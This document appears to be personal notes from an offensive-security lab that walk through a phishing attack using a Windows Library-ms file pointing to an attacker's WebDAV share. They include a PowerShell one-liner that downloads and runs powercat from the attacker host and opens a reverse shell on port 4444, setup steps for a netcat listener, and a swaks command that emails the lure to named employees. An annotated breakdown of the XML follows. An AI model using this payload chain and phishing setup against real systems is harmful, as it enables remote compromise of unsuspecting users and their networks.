Save a file named config.Libray-ms on a Windows Machine:
==============================================
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.162</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
==============================================

# Create a new shortcut file with payload, called "install":
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.162:8000/powercat.ps1'); powercat -c 192.168.45.162 -p 4444 -e powershell"

==============================================
@KALI
==============================================
Save config.Library-ms and install to webdav path.
Serve at port 8000 powercat.ps1
Start nc at 4444
==============================================

# Create a file body.txt with content.
# Send the email:
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.241.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap



With this content:
WTF: libraryDescription shows the namespace for the version of the library file format starting from Windows 7
https://docs.microsoft.com/en-us/windows/win32/shell/library-schema-entry
==============================
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">

</libraryDescription>
==============================

Add this:
WTF: version is arbritary, but name is the specific name of the lib, like @shell32.dll,-34575
https://docs.microsoft.com/en-us/windows/win32/shell/library-schema-entry#namespace-versioning
https://docs.microsoft.com/en-us/windows/win32/shell/schema-library-name
==============================
<name>@windows.storage.dll,-34582</name>
<version>6</version>
==============================

Next this:
WTF: islibpinned will show at explorer as a dir; inconRef will show specific icon from win, "-1002" for the Documents folder
https://docs.microsoft.com/en-us/windows/win32/shell/schema-library-islibrarypinned
https://docs.microsoft.com/en-us/windows/win32/shell/schema-library-iconreference
==============================
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
==============================

Then this:
WTF: determine the columns and details that appear in Windows Explorer
https://docs.microsoft.com/en-us/windows/win32/shell/schema-library-templateinfo
https://docs.microsoft.com/en-us/windows/win32/shell/schema-library-foldertype
==============================
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
==============================

And this:
WTF: Shows the location of WebDAV:
https://docs.microsoft.com/en-us/windows/win32/shell/schema-library-searchconnectordescriptionlist
https://docs.microsoft.com/en-us/windows/win32/search/search-schema-sconn-isdefaultsavelocation
https://docs.microsoft.com/en-us/windows/win32/search/search-schema-sconn-simplelocation
==============================
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.2</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
==============================
